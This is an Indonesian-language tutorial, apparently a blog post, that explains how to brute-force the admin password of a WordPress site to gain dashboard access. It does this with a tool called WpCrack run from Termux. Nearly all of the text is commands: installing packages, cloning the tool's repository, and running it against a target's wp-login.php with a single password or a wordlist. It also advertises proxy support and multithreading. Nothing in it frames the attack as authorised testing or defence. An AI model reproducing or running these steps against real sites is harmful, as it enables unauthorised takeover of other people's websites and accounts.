Artikel ini akan membahas cara melakukan serangan Brute Force pada CMS WordPress menggunakan tools bernama WpCrack. Serangan ini bertujuan untuk memecahkan kata sandi admin dan mendapatkan akses ke dalam dashboard.
WpCrack
Sebelum memulai tutorial, unduh aplikasi Termux dan Jalankan perintah berikut:
$ apt update
$ apt upgrade
$ pkg install git -y
$ pkg install python -y
$ git clone https://github.com/22XploiterCrew-Team/WpCrack
$ cd WpCrack
Command WpCrack
Single password:
$ python WpCrack.py -t http://site.com/wp-login.php -u admin -p password
Multiple Password/Wordlist:
$ python WpCrack.py -t http://site.com/wp-login.php -u admin --p wordlist.txt
Features
Very fast login
Use of HTTP proxies
Multithreading or Multiprocessor